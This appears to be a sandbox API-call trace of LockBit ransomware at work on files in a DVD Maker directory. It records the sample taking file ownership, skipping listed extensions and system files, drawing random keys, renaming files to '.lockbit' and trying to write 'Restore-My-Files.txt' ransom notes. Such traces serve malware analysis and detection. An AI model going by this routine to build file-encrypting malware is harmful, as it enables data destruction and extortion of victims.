InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.037] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.037] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.037] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.038] CloseHandle (hObject=0x3c0) returned 1 [0080.038] free (_Block=0x77d800) [0080.038] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0080.038] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.038] malloc (_Size=0x40068) returned 0x3df0008 [0080.038] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27281) returned 1 [0080.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0080.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0080.039] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0080.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.044] malloc (_Size=0xaa) returned 0x1ff1e60 [0080.044] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0080.044] free (_Block=0x1ff1e60) [0080.044] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.044] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.044] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.045] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0x520150, dwReserved1=0x0, cFileName="circleround_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0080.045] lstrcmpiW (lpString1=".", lpString2="circleround_selectionsubpicture.png") returned -1 [0080.045] lstrcmpiW (lpString1="..", lpString2="circleround_selectionsubpicture.png") returned -1 [0080.045] PathFindExtensionW (pszPath="circleround_selectionsubpicture.png") returned=".png" [0080.045] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.045] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.045] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.046] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.046] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.046] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.046] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.046] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.046] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.046] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.046] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.047] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.047] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.047] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.047] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.047] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.047] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.047] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.047] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.047] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.047] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="circleround_selectionsubpicture.png") returned 1 [0080.047] lstrcmpiW (lpString1="ntldr", lpString2="circleround_selectionsubpicture.png") returned 1 [0080.047] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="circleround_selectionsubpicture.png") returned 1 [0080.047] lstrcmpiW (lpString1="bootsect.bak", lpString2="circleround_selectionsubpicture.png") returned -1 [0080.047] lstrcmpiW (lpString1="autorun.inf", lpString2="circleround_selectionsubpicture.png") returned -1 [0080.047] lstrcmpiW (lpString1="thumbs.db", lpString2="circleround_selectionsubpicture.png") returned 1 [0080.047] lstrcmpiW (lpString1="iconcache.db", lpString2="circleround_selectionsubpicture.png") returned 1 [0080.047] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.047] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned=".png" [0080.047] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.047] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.047] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.048] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.048] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.048] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.048] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.049] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.049] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.049] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.049] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.049] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.lockbit") returned 88 [0080.049] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.053] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.054] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.054] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.054] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.054] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.054] RtlFreeAnsiString (AnsiString="\\") [0080.054] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c4) returned 0x0 [0080.054] malloc (_Size=0x200) returned 0x77d800 [0080.054] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.055] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.055] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.055] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.055] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.055] CloseHandle (hObject=0x3c4) returned 1 [0080.055] free (_Block=0x77d800) [0080.056] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.056] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.056] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.056] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3878) returned 1 [0080.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.057] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.057] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.060] malloc (_Size=0xc6) returned 0x1ff1e60 [0080.060] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0080.060] free (_Block=0x1ff1e60) [0080.061] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.061] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.061] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.061] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebcc13a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebcc13a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0x520150, dwReserved1=0x0, cFileName="circleround_videoinset.png", cAlternateFileName="")) returned 1 [0080.061] lstrcmpiW (lpString1=".", lpString2="circleround_videoinset.png") returned -1 [0080.061] lstrcmpiW (lpString1="..", lpString2="circleround_videoinset.png") returned -1 [0080.061] PathFindExtensionW (pszPath="circleround_videoinset.png") returned=".png" [0080.061] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.061] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.061] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.062] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.062] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.062] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.062] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.062] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.062] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.062] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.063] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.063] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.063] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.063] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.063] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="circleround_videoinset.png") returned 1 [0080.063] lstrcmpiW (lpString1="ntldr", lpString2="circleround_videoinset.png") returned 1 [0080.063] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="circleround_videoinset.png") returned 1 [0080.063] lstrcmpiW (lpString1="bootsect.bak", lpString2="circleround_videoinset.png") returned -1 [0080.063] lstrcmpiW (lpString1="autorun.inf", lpString2="circleround_videoinset.png") returned -1 [0080.063] lstrcmpiW (lpString1="thumbs.db", lpString2="circleround_videoinset.png") returned 1 [0080.064] lstrcmpiW (lpString1="iconcache.db", lpString2="circleround_videoinset.png") returned 1 [0080.064] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.064] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned=".png" [0080.064] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.064] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.064] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.064] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.065] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.065] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.065] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.065] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.065] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.065] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.065] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.065] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.065] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.065] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.065] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.lockbit") returned 79 [0080.065] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.066] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.066] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.066] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.067] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.067] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.067] RtlFreeAnsiString (AnsiString="\\") [0080.067] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3a0) returned 0x0 [0080.067] malloc (_Size=0x200) returned 0x77d800 [0080.067] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.067] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.067] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.067] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.084] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.084] CloseHandle (hObject=0x3a0) returned 1 [0080.084] free (_Block=0x77d800) [0080.084] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.085] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.085] malloc (_Size=0x40068) returned 0x1ff1e60 [0080.086] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5059) returned 1 [0080.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0080.087] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.087] 